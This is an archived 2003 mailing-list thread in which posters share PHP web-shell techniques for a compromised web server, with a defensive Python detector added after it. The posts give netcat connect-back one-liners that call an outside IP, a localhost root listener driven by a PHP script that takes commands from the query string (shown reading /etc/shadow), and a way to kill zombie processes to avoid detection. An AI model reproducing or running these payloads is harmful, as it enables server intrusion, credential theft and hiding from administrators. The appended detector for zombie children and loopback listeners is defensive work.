Hi, I've been using this technique for a while. If you can upload a php or a perl file which gets executed in the server context you have already won, regardless of firewall rules. The obvious method is the connect-back (i.e. nc -e /bin/sh x.x.x.x 80, as that's the likely allowed outbound port). If that's a no-go, and there's absolutely no way to establish a session, you still win. Consider this:

    <? `exploit which gets root and calls nc -e /bin/sh -l -p 9999` ?>

then another script:

    <?
    $x = $_GET['x'];                      // command taken from the query string
    $z = `echo $x | nc localhost 9999`;   // hand it to the root listener (same port as above)
    $z = str_replace("\n", "<br>", $z);   // make the output readable in a browser
    echo $z;
    ?>

As is obvious, call the second script and you have somewhat of a crippled root shell:

    www.target.com/script2.php?x=cat /etc/shadow

You get the point :P

PS: the silly thing about this is that each command you execute this way ends up as a zombie process. In a few minutes of working with this "shell" you'll have hundreds of zombie processes on the target machine. What I like to do is run zkill (zkill.c, google it), slightly modified to terminate all zombies. This way it's less obvious that something very odd is going on.

--- Knud_Erik_Højgaard <kainat_private> wrote:
> Ingram wrote:
> [snip]
> > I got right now is uid www. I think a connect-back perl/php code
> > could make it through this packet filter, as the outbound rules could
> > be less tight.
> >
> > Anyone aware of a backdoor like this?
> netcat:
> <? passthru("nc -e /bin/sh ip port"); ?>
>
> or a cronjob doing the same..
>
> --
> kokanin
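The post above names two things a defender can look for on the box: a pile of zombie children under the web server's worker processes, and a shell listener bound only to 127.0.0.1. The script below is an added example (not part of the original post or its author's zkill tool) that checks for both on constructed, labelled sample output of `ps -eo pid,ppid,stat,user,comm` and `netstat -tlnp`. It assumes the web server runs as user "www" (as in the thread) and that nothing legitimate listens on loopback except what you put in the allowlist.

```python
"""Flag the two symptoms of the localhost-listener web shell described in the thread:
zombie children of web-server workers, and loopback-only TCP listeners."""
from collections import Counter

# Constructed sample of `ps -eo pid,ppid,stat,user,comm` output; not from a real host.
SAMPLE_PS = """\
  PID  PPID STAT USER     COMMAND
    1     0 S    root     init
  812     1 S    root     httpd
  840   812 S    www      httpd
  841   812 S    www      httpd
  901   840 Z    www      sh
  902   840 Z    www      sh
  903   841 Z    www      sh
  950     1 S    root     nc
  951   950 S    root     sh
"""

# Constructed sample of `netstat -tlnp` output; not from a real host.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      812/httpd
tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      950/nc
"""


def parse_ps(text):
    """Parse `ps -eo pid,ppid,stat,user,comm` output into dicts; the header row is skipped."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 4)
        if len(parts) < 5:
            continue
        pid, ppid, stat, user, comm = parts
        procs.append({"pid": int(pid), "ppid": int(ppid), "stat": stat,
                      "user": user, "comm": comm})
    return procs


def zombie_children(procs, parent_user):
    """Count zombie ('Z' state) children per parent PID, for parents owned by parent_user.
    A web shell run through backticks leaves one zombie per executed command under the
    worker that served the request, so counts pile up on the worker PIDs."""
    owner = {p["pid"]: p["user"] for p in procs}
    counts = Counter()
    for p in procs:
        if p["stat"].startswith("Z") and owner.get(p["ppid"]) == parent_user:
            counts[p["ppid"]] += 1
    return dict(counts)


def loopback_listeners(text, allowed=()):
    """Return (program, port) for TCP LISTEN sockets bound only to 127.0.0.1 whose
    program name is not in the allowlist. A connect-back is not needed if the attacker
    can reach a loopback listener through the web server itself."""
    found = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 7 or cols[0] != "tcp" or cols[5] != "LISTEN":
            continue
        addr, port = cols[3].rsplit(":", 1)
        prog = cols[6].split("/", 1)[1]
        if addr == "127.0.0.1" and prog not in allowed:
            found.append((prog, int(port)))
    return found


def report(ps_text, netstat_text, web_user="www", allowed_loopback=()):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    for ppid, n in sorted(zombie_children(parse_ps(ps_text), web_user).items()):
        findings.append(f"{n} zombie child(ren) under {web_user} worker pid {ppid}")
    for prog, port in loopback_listeners(netstat_text, allowed_loopback):
        findings.append(f"loopback-only listener {prog} on 127.0.0.1:{port}")
    return findings


if __name__ == "__main__":
    for line in report(SAMPLE_PS, SAMPLE_NETSTAT):
        print(line)
```

On a live host, feed it the real command output instead of the samples; a handful of zombies under a worker is normal churn, so alert on sustained counts rather than a single hit, and populate the loopback allowlist from a known-good baseline before trusting the second check.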
This archive was generated by hypermail 2b30 : Wed Jul 30 2003 - 12:28:38 PDT